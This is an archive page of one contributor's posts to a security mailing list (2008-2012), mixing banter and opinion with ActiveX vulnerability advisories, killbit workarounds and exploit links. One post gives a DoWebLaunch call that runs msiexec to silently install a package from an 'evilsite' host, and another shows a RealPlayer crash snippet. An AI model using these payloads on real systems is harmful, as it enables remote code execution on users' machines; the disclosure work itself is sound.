My .0002
elazar
On Thursday, June 21, 2012 at 3:26 PM, Thor (Hammer of God)
wrote:
>
>I completely agree with Gage. The way I see it, security through
>obscurity is perfectly valid as long as the control remains
>obscured. I think the "anyone can just scan your ports"
Ferenc,
I got one as well a few weeks ago. I suspect you are correct in your
assumption.
elazar
On Tuesday, April 24, 2012 at 4:03 AM, Ferenc Kovacs wrote:
>
>Hi,
>
>Anybody else got this message? I think they are "spamming" the
>subscribers/regular
2012 07:58:09 +0100
(BST)
At least configure your SPF record policy to hard fail, and consider Domain
Keys and/or DMARC.
elazar
On Tuesday, April 17, 2012 at 10:40 AM, a...@infosecinstitute.com wrote:Guys,
this is a fake release, someone spoofed my email and sent this out
as a joke to mock
"Sounds like this industry could benefit from these kids even more
since they are driving home the points you all are supposed to be
warning them about."
That's because these kids don't have mouths to feed and a paycheck to
worry about. Ethics and ethos are all very nice when you have
r security
posture is moot" make for an easy target. I still like the fact
that real-time drone video can be viewed using SkyGrabber, don't
most local LEO use the same technology(albeit on a smaller scale)?
I'm sure many criminals and organized crime can afford a DVB-S
card...
My
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
http://www.eff.org/issues/printers
On Tue, 12 Jul 2011 16:48:45 -0400 Jason Ellison
wrote:
>list,
>
> Sometime ago I remember reading an article on printers being
>used to
>gain intelligence in an embassy or government agency. The
>printer
>had a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Most people charge for that, the least Juan could do is give you a
*free* "license" for his scamware(we know you want it ;) ).
Ah, the state of so-called "security" these days...it's
sad.
elazar
On Wed, 22 Jun 2011 2
t;On Mon, Feb 21, 2011 at 9:10 PM, Elazar Broad
> wrote:
>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> (never start a sentence with)And just to be the grammar douche,
>> that should be:
>>
>>
>> With the latTer as the majority o
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
(never start a sentence with)And just to be the grammar douche,
that should be:
With the latTer as the majority of course.
elazar
On Mon, 21 Feb 2011 14:32:36 -0500 Christian Sciberras
wrote:
>I agree, you should move your business to IRC. T
k(i.e IPSEC etc.), would you
still do it?
my .02
elazar
On Sun, 06 Feb 2011 09:47:39 -0500 phocean <0...@phocean.net> wrote:
>Hi all,
>
>I would like to get some feedback about the vswitches and how to
>deal
>with physical network separation.
>I have an idea about this but I w
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Just lightly scratching the surface, KeyScrambler.sys is signed by
GlobalSign, strings reveals nothing interesting other than OpenSSL
0.9.8a is used.
elazar
On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault
wrote:
>Call me paranoid, but that s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
It is definitely possible(http://www.cultofmac.com/android-app-
sends-personal-data-to-china/52929), there have been several well
know local root exploits(i.e. http://c-
skills.blogspot.com/2010/08/please-hold-line.html) for the Android
system, though
trying to clean (hint..hint blended threats).
Backup your stuff, dban the drive(zero's, 1 pass) and rebuild the
box.
elazar
On Tue, 23 Nov 2010 09:26:49 -0500 "Mikhail A. Utin"
wrote:
>As we see, our list has a few (luckily just a few) unprofessional
>people thinking of themsel
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
+1 for Vipre, its cheap(about $10 or less per seat, per year),
generally resource conscious and pretty granular centralized policy
management and last but not least, its detection and fp to fn ratio
is pretty solid. Aside from a recent issues with its
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Can't you? The world is full of unpatched systems. You can even find
systems where patches are not installed because it is running a
piece of
mission critical software and they would lose support if they
installed
any patches (I am not making this up)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ed or nano? :)
On Thu, 29 Jul 2010 20:47:19 -0400 valdis.kletni...@vt.edu wrote:
>On Thu, 29 Jul 2010 17:18:28 PDT, Zach C said:
>> So if Drupal and WordPress, etc. are so terrible, what would you
>all recommend?
>
>vi or emacs. Take your pick, I'm no
code.
Fix
-
SAP set the kill-bit for this control with Patch 17 for SAPGui.
Alternatively, you can set the kill-bit manually, please see
http://support.microsoft.com/kb/240797.
Credit
-
Elazar Broad
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This
/index.html.
elazar
On Tue, 25 May 2010 16:08:45 -0400 valdis.kletni...@vt.edu wrote:
>On Wed, 26 May 2010 01:25:25 +0545, Bipin Gautam said:
>
>Rest of article actually looks good at first glance, but this
>jumped out at me:
>
>> > -Software disk Wiping:
>> > W
7; without the client seeing
that too?
elazar
On Thu, 06 May 2010 13:46:08 -0400 T Biehn wrote:
>A proxy or 'web-service firewall' prior to the 'protected' web
>service is
>the correct answer.
>
>Obfuscating the client code be it JavaScript, Interpreted (Java,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Unless you wrap your service methods with some form of an
authentication, your webservice's are just as public as any other
"world" accessible part of your site. Are the pages calling these
services behind any sort of authentication?
On Thu, 06 May 20
**
>"It is as useless to argue with those who have
>renounced the use of reason as to administer
>medication to the dead." Thomas Jefferson
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.gro
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Works fine for me...
On Sun, 06 Sep 2009 14:23:37 -0400 David Alanis
wrote:
>Good Day,
>
>Anyone happen to know what is going on with www.modsecurity.org or
>
>www.breach.com?
>
>Cheers,
>David
>
>-
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
http://www.sandboxie.com/
On Fri, 04 Sep 2009 14:05:24 -0400 RandallM
wrote:
>how come we just can't sandbox the browser in away from the
>system.
>its the users that just get gmail and click links, watch youtube
>vids
>and check FaceBook and Mypace
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Like them or not, M$ has done quite a bit with its SDL[1], and
though quite late in the game, the memory protection mechanism's in
Vista and Windows 7. As far as anti-virus software goes, it's
mostly useless[2][there was a recent article on signature l
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, 28 Aug 2009 16:34:27 -0400 Paul Schmehl
wrote:
>--On Friday, August 28, 2009 13:40:28 -0500 Rohit Patnaik
>
>wrote:
>
>>
>> To be fair, Linux has come a very long way in that regard. I
>purchased
>> an Asus Eee 900 with Linux preinstalled, a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Fri, 28 Aug 2009 17:20:09 -0400 Peter Besenbruch
wrote:
>> > The OS on my machines will not allow a person to run an
>administrative
>> > desktop. It enforces the separation between the administrator
>and a
>> > normal user by requiring the creat
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
There's a few on Milw0rm(2,3,4 I believe)...
On Thu, 30 Jul 2009 00:59:34 -0400 NAHieu wrote:
>this is hilarious!
>
>i am wondering where to get other issues, i.e zf01 --> zf04?
>
>thanks,
>H
>
>On Wed, Jul 29, 2009 at 8:32 AM, Headenson
>John wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I've seen enough RAID controllers take a crap all over all the
disks far too many times in my career.
http://www.channelregister.co.uk/2009/03/23/carbonite_sues_promise/
Sound familiar?
On Thu, 16 Jul 2009 13:52:16 -0400 valdis.kletni...@vt.ed
rded your issue in our
tracking database and will determine its priority if/when we
determine new investment is required for this technology.
Thank You – Autodesk"
Timeline:
06/17/2008 - Vendor notified
03/31/2009 - Vendor final response
04/02/2009 - this advisory
Credit:
Elazar Broad
-
t;'breaking and entering' into their mind?
>
>-Travis
>
>On Fri, Mar 13, 2009 at 4:53 PM, Elazar Broad
> wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> I am inclined to agree, except that you still have issues with
>the
>>
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I am inclined to agree, except that you still have issues with the
electronic equivalent of breaking and entering. Case in point,
there is a good chance you would be arrested and prosecuted if you
opened the door to another persons dwelling which did n
waste of time.
Workaround:
As previously stated, the web server is not enabled by default.
If you do need to use it, use a firewall or OS port filtering
capabilities to restrict access.
Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https
has been notified.
Workaround:
Set the killbit for the affected control, see
http://support.microsoft.com/kb/240797.
Use the Java installer for TeamLinks Client or install the software
manually from: http://teamlinks.imera.com/download.html
Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
...stealthy infection is trickier.
but not impossible, checkout Symantec/F-Secure joint analysis of
mebroot: https://forums.symantec.com/t5/blogs/blogprintpage/blog-
id/malicious_code/article-
id/244;jsessionid=A4811540934368155A4B0BEE4D0B0615. Now
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
"You know how the current amateur botnet offerings are basing
domain lists off the current time to allow the 'good guys' to
prepare?"
Shhh, your gonna wake the " writes all the
malware" theorists...
On Thu, 19 Feb 2009 23:13:38 -0500 T Biehn wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I maintain that by not educating our users we are failing in that
goal.
With many it is in one ear, out the other, unless you are allowed
to use a clue bat...
On Fri, 06 Feb 2009 09:36:32 -0500 Kevin Wilcox
wrote:
>2009/2/6 Yudi Rosen :
>
>> But J
increase slightly over the life of the mouse
in order to solve the blind shock and click problem...
elazar
On Fri, 06 Feb 2009 05:57:03 -0500 Yudi Rosen
wrote:
>But Joe the Plumber doesn't want to have to click on endless
>'confirm'
>dialogs every time he tries to use the com
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
And you can probably find a majority of those 72 listed here
http://www.nsopw.gov...
On Fri, 23 Jan 2009 10:24:12 -0500 Miller Grey
wrote:
>...hehe...
>
>On Mon, Jan 12, 2009 at 7:50 PM, wrote:
>
>> On Mon, 12 Jan 2009 09:41:19 PST, Rants nRaves s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
is more cost effective
should have been is *it
On Wed, 31 Dec 2008 12:57:52 -0500 Elazar Broad
wrote:
>That's true, keeping up with security is not cheap nor easy.
>Tradeoff's are tradeoff's, the question is, when it comes
c 2008 16:42:47 -0500 valdis.kletni...@vt.edu wrote:
>On Tue, 30 Dec 2008 16:13:07 EST, Elazar Broad said:
>> And they should have listened then, it was only a matter of time
>> before someone fleshed out a practical attack, and that time is
>> now. Then again, I am sure there some
lowing up on internet carders and shutting them down.
>>
>> On Tue, Dec 30, 2008 at 5:03 PM, Elazar Broad
> wrote:
>> > -BEGIN PGP SIGNED MESSAGE-
>> > Hash: SHA1
>> >
>> > SSL/PKI is only as strong as the weakest CA...
>> >
>&
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I am waiting for RapidSSL's reaction, then again, $12 certs, you
get what you pay for...
On Tue, 30 Dec 2008 14:02:11 -0500 James Matthews
wrote:
>This is going to be fun for all e-commerce sites etc
>
>On Tue, Dec 30, 2008 at 7
Years!
elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify
wpwEAQECAAYFAklaVFQACgkQi04xwClgpZh4TQP+ODe2/jTHhOrLbKtoSJhZInX+lJXt
LMkU/xlYK1Au/f1E5KhXt43uMWYSeC/M0njQRPLyrDfihFlLsmAxGK/97kRQfxEttbcN
R
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
April Fools isn't for another 4 months...
On Mon, 22 Dec 2008 17:53:29 -0500 n3td3v
wrote:
>Real researchers who should be taken seriously aren't taken
>seriously anymore.
>
>I'm leaving full-disclosure because of the abuse.
>
>It's just turned into
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Barracuda opened this up to the public back in September, see
http://www.barracudacentral.org/rbl. I have been using it for about
2 months or so, it seems to be pretty effective. Is anyone else out
there using it? What do you think?
elazar
-BEGIN
.
>
>You should revisit this opinion after you're out of school and in
>the
>workforce for 5 years. :)
>
>On Tue, Dec 9, 2008 at 1:53 PM, Luke Scharf <[EMAIL PROTECTED]>
>wrote:
>
>> Elazar Broad wrote:
>> > Neither, because ultimately no one care
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Financial IT has much competence, the problem is the red tape and
politics that many face when trying to get the job done, but then
again, you have that everywhere, I am just venting/lamenting over
it...
On Wed, 10 Dec 2008 12:23:38 -0500 Luke Scharf
Luke Scharf <[EMAIL PROTECTED]>
wrote:
>Elazar Broad wrote:
>> Neither, because ultimately no one cares, and that is why the
>> financial industry foots the 60 billion identity theft bill. My
>> rant was a little bit of wishful thinking and a shred of belief
>in
>>
[EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 13:26:15 EST, Elazar Broad said:
>> I never said we need to do something, passive awareness *can* go
>a
>> long way...
>
>Right. The danger is that you want to give the people a *reason*
>to
>care.
>
>"If you'
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I never said we need to do something, passive awareness *can* go a
long way...
On Tue, 09 Dec 2008 13:12:25 -0500 [EMAIL PROTECTED] wrote:
>On Tue, 09 Dec 2008 12:20:36 EST, Elazar Broad said:
>> Changing the public opinion and mindset m
Following a major cyber-attack, he told legislators,
>electricity,
>banking, and communications could all go dead, leaving Americans
>scrounging
>for food, water, gasoline—even hunks of firewood traded on the
>black market.
>
>
>On Tue, Dec 9, 2008 at 6:39 AM, Elazar Broad <[EMAI
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Brilliant use of deflection, keep it up, you might end up as some
loser serial rapist on Law and Order, oh wait, they want actor's,
not the real thing...
On Tue, 09 Dec 2008 11:55:08 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Dec 9, 2008 at 3:08
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
They ain't called beltway bandits for nothing...
On Mon, 08 Dec 2008 23:28:52 -0500 "Rafal @ IsHackingYou.com"
<[EMAIL PROTECTED]> wrote:
>Ivan, all,
>
>Hold the phone...$5k-$7k to fix an infected device!? Really?
>HOLY
>CRAP... either that's a c
r system
has turned into a complete and utter joke(for the most part), so my
friend, you see, this a complete exercise in futility(besides the
fact that every friggin AV/IDS/Security/SIM company out there has
red, yellow and green as their corporate "flag", if you are just
joining the party, th
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I stopped using SonicWall when I learned I had to purchase a whole
new device for a customer that just wanted to add a few more
machines to their network, instead of bumping the license like most
"normal" vendors.
On Tue, 02 Dec 2008 14:14:43 -0500 IT
gt;--On November 26, 2008 1:59:27 AM -0600 Elazar Broad
><[EMAIL PROTECTED]>
>wrote:
>
>>
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Um, NTLM isn't the only 20 or so year old protocol to take the
>rap
>> recently, I can thin
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Um, NTLM isn't the only 20 or so year old protocol to take the rap
recently, I can think of a low numbered rfc, lets say 1034 and
1035. Hindsight is 20/20, and 20 years ago, who would have thought
that a 16 bit number was way too small for DNS transact
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Symantec's Endpoint Protection has a device control feature which
basically functions as you have stated. I haven't really played
around with it much, however, it can block devices based on device
id...
elazar
On Mon, 24 Nov 2008 00:1
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
A quick test of OWA 2007 shows that it is not vulnerable...
On Sat, 15 Nov 2008 11:36:26 -0500 Micheal Cottingham
<[EMAIL PROTECTED]> wrote:
>I found and reported this back in 2005/2006. Microsoft told me
>that it
>had been reported previously and tha
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
What scene...
On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>i've been monitoring the scene since 1999 so what do you mean no
>experience? i make that about 10 years experience if my math is
>correct.
>
>On Fri, Nov 7, 2008 at 1
ones ain't that good compared to the Russians.
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <[EMAIL PROTECTED]>
>wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Whats your poison of choice?
>>
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Whats your poison of choice?
On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
<[EMAIL PROTECTED]> wrote:
>I already have a drinking game going, awarding myself a drink for
>every time n3td3v says something stupid, and every time I play it
>I
>run out
So take it up with him like a man and not on our inboxes...
On Tue, 14 Oct 2008 08:51:33 -0400 n3td3v <[EMAIL PROTECTED]>
wrote:
>On Tue, Oct 14, 2008 at 1:28 PM, M. B. Jr.
><[EMAIL PROTECTED]> wrote:
>> And by the way, why insistently and specifically targeting
>Metasploit?
>
>i don't like hd
etty high. You can't forget the
"somewhat" obvious as well, if you found it, someone else can find
it too. As far as the vendor is concerned, well, we all know what
happened to a certain electronic voting machine vendor...Look, I'm
not expert, this is just my .02...
elazar
On Sun
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I would opt for #1, additionally, contacting CERT and other quasi-
government security organizations would be a plus, they might have
better luck lighting a fire under the theoretical vendors ass...
elazar
On Sat, 27 Sep 2008 03:39:34 + Simon
PoC
06/25/2008 <- Vendor responds stating that they are aware of this
issue
08/06/2008 - Disclosure
Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQECAAYFAkiZ3PAACgkQi04xwClgpZiyOgP8CM9oC+m3tr5
On Mon, 28 Jul 2008 13:14:37 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Trend Micro
>http://www.trendmicro.com
>
>What:
>OfficeScan 7.3 build 1343(Patch 4) and older
>http://www.trendmicro.com/download/product.asp?productid=5
>
>How:
>OfficeScan
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Who:
Trend Micro
http://www.trendmicro.com
What:
OfficeScan 7.3 build 1343(Patch 4) and older
http://www.trendmicro.com/download/product.asp?productid=5
How:
OfficeScan's Web Console utilizes several ActiveX controls when
deploying the product throug
these were not).
Fix:
Real Networks has released fixes for this issue, please see
http://service.real.com/realplayer/security/07252008_player/en/
Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify
Or this http://www.emergingthreats.net/content/view/87/1/
On Fri, 25 Jul 2008 14:22:22 -0400 "Albert R. Campa"
<[EMAIL PROTECTED]> wrote:
>check this out
>http://securabit.com/2008/07/24/latest-snort-signature-to-detect-
>dns-vulnerability/
>
>
>On Fri, Jul 25, 2008 at 12:59 PM, crazy frog crazy
Sorry if I was not clear enough, I meant in the commit comments. I
agree, you need about a brain and a half to spot kernel bugs in the
code itself...
On Thu, 17 Jul 2008 10:58:03 -0400 Paul Schmehl
<[EMAIL PROTECTED]> wrote:
>--On Thursday, July 17, 2008 10:35:21 -0400 Elazar Broad
along with
the general public don't have to rely on "HIGHLY SUGGESTED THAT YOU
UPGRADE" announcements from the kernel maintainers without knowing
why.
Elazar
On Thu, 17 Jul 2008 06:57:57 -0400 Dave Aitel
<[EMAIL PROTECTED]> wrote:
>I think what Brad and the Pax Team are say
[EMAIL PROTECTED]
http://osvdb.org/vendor/1/Oracle%20Corporation
On Wed, 16 Jul 2008 19:22:01 -0400 Kristian Erik Hermansen
<[EMAIL PROTECTED]> wrote:
>Anyone have it?
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full
I can confirm the same behavior on a Cisco PIX 501 running 6.3(5).
Port numbers are incremented sequentially by one...
On Fri, 11 Jul 2008 11:01:33 -0400 Thomas Cross <[EMAIL PROTECTED]>
wrote:
>Riad,
>
>Thanks for testing this. A number of other readers wrote me
>privately
>confirming your
Probably, I completely missed that, and they do seem to be the
defaults. I'll test it out tomorrow. Thanks Paul!
On Thu, 10 Jul 2008 22:31:56 -0400 Paul Szabo
<[EMAIL PROTECTED]> wrote:
>Elazar,
>
>> ... Internet Explorer [with] proxy auto-configuration ...
>> Th
Explorer can properly
differentiate what is on the local network or not. I guess if it
can't then this whole issue is moot.
Elazar
--
Beauty Advice Just Got a Makeover
Read reviews about the beauty products you have always wanted to try
http://tagline.hushmail.c
"We are an impatient lot in this community." - well said...
On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux"
<[EMAIL PROTECTED]> wrote:
>On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
>> Please allow at least one week for us to respond before public
>> disclousure. We only recei
Does anyone have a security contact for Autodesk?
elazar
--
Let great B to B marketing solutions propel your brand to new heights! Click
now!
http://tagline.hushmail.com/fc/Ioyw6h4euHqyTMpSKWWGNSUg4MAvp9z9bcMg7Dx2cKwC9V6EIDLvFO/
___
Full-Disclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Yup, CCEs and default configurations/passwords are definitely quite
common. The folks over at gnucitizen have been hitting on this for
some time with their work on the bt home hub...
Elazar
On Fri, 23 May 2008 12:16:45 -0400 Paul Schmehl
<[EM
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
The out of the box ruleset for SmartDefense on the FW1 does some
basic string checking on web traffic(i.e. checking get and post
variables for sql injection and xss etc.) along with some strict
RFC checks, I don't know to what extent though...
E
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Its not even funny how often this happens. I have a friend who does
some consulting work for small businesses, and the amount of times
that he has come across medical practices that run their billing
and record keeping software on the same "fully-loade
Yea, and there are plenty that can't even set up their own home
network...
On Mon, 19 May 2008 15:34:41 -0400 Soldi <[EMAIL PROTECTED]>
wrote:
>> CISSP's cant hack
>
>Huh?
>
>There are plenty of CISSPs you wouldn't want on your bad side.
>They just decided to grow up and make a legitimate livi
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Keep in mind that rootkit functionality itself isn't all bad, take
anti-virus software for example. Its like a shark trawling the
bottom of the sea floor, looking up at its next meal on high; how
deeply can you hook the OS core...
Elazar
On Su
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Now that this is patched...
http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/
browser/realplayer_console.rb
Elazar
On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<[EMAIL PROTECTED]> wrote
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Let the foolz begin :) Happy April 1st!
On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION
<[EMAIL PROTECTED]> wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WIT
sole;
obj.Console = buf;
obj.Console = m
//repeat
m = obj.Console;
obj.Console = buf;
obj.Console = m --> Should crash here
- -
Workaround:
Set the killbit for this control. See
http://support.microsoft.com/kb/240797
Fix:
No official fix known
Exploit:
Working on it
Elazar
-BEGIN PGP SI
known
Exploit:
Will be posted on milw0rm.com
Elazar
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5
wpwEAQECAAYFAkfDo+EACgkQi04xwClgpZiSQwP+OVVbAEDFc728APhQBQgcgeOXP/6K
WcLjPLdz2lXRO3P15Umrqgr6tChJ0HbsW
http://blog.wired.com/27bstroke6/2008/02/researchers-dis.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
fix known
Workaround:
Set the killbit for this control, see
http://support.microsoft.com/kb/240797
Exploit:
http://milw0rm.com/exploits/5052
--
Click for quotes on adjustable mortgages.
http://tagline.hushmail.com/fc/Ioyw6h4dOB3cb6dJ2dcFs51ffjQiUKtIWvCZi2vPoyRVHjiVujrapq/
Elazar
these controls, see
http://support.microsoft.com/kb/240797
Exploit:
Code should be posted on milw0rm shortly
Elazar
--
Click here for free information on how to reduce your debt by filing for
bankruptcy.
http://tagline.hushmail.com/fc/Ioyw6h4elLzBhoUyndVr9y0FUHMKd5NvFr9ZX2hIQb9ucOEZJ
uffer overflow in the Action
property.
I believe FaceBook also uses/repackages the Aurigma control, I
don't know which version though.
Fix:
No official fix known
Vendor notified
Workaround:
Set the KillBit for this control, see
http://support.microsoft.com/kb/240797
Elazar
--
Boost you
better yet, remove it altogether.
Fix:
No official fix known
P.S. To SF and others, e.b. is my initials :)
--
Live your dreams. Click here to find information on becoming a lawyer.
http://tagline.hushmail.com/fc/Ioyw6h4fKhCPKyEBGODBuqbJgM0Y38sJNAXMugFnArEBr0pt1IXX4E/
Elazar
://support.microsoft.com/kb/240797.
Fix:
None
Elazar
--
Discount Online Trading - Click Now!
http://tagline.hushmail.com/fc/Ioyw6h4dPYx7ZmCQyHvyhhKXQYuaLsrMOTxQzc4Yz437yYvD3WgHIM/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure
Cryptsetup with LUKS is an option, you could build a custom kernel
and initrd and put it on a UFD...
Elazar
On Wed, 16 Jan 2008 10:38:37 -0500 coderman <[EMAIL PROTECTED]>
wrote:
>On Jan 16, 2008 4:53 AM, Frank Sanders <[EMAIL PROTECTED]>
>wrote:
>> Can any o
e) on Milw0rm, exploiting this is pretty self
explanatory though...
Elazar
On Mon, 14 Jan 2008 19:51:22 + Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Macrovision
>
>What:
>Macrovision FlexNext Connect is a software package that allows
>ISV's to update their software
system.
On Mon, 14 Jan 2008 14:51:22 -0500 Elazar Broad
<[EMAIL PROTECTED]> wrote:
>Who:
>Macrovision
>
>What:
>Macrovision FlexNext Connect is a software package that allows
>ISV's to update their software products. It is generally used in
>conjunction with the I
Who:
Macrovision
What:
Macrovision FlexNext Connect is a software package that allows
ISV's to update their software products. It is generally used in
conjunction with the InstallShield software deploymnet framework.
FlexNet uses a number of ActiveX controls, some of which are marked
safe for
the killbit for this this control, see
http://support.microsoft.com/kb/240797
Elazar
--
Self Storage Options - Click Here.
http://tagline.hushmail.com/fc/Ioyw6h4eNgRQWOP1FhRQ2cKm8Nmb4ptQwJo9icblrmiIEVMf7OxT9O/
___
Full-Disclosure - We believe in it
I was playing with this a bit more. Everybody has the Windows
Installer installed, right? How about this:
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe",
"","/i http://www.evilsite.com/evilapp.msi /quiet");
Elazar
On Tue, 08 Jan 200
files, weblaunch.ocx is vulnerable to
the above mentioned buffer overflow, I have not checked
weblaunch2.ocx. Exploit: http://www.milw0rm.com/exploits/4869
Elazar
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure
1 - 100 of 137 matches
Mail list logo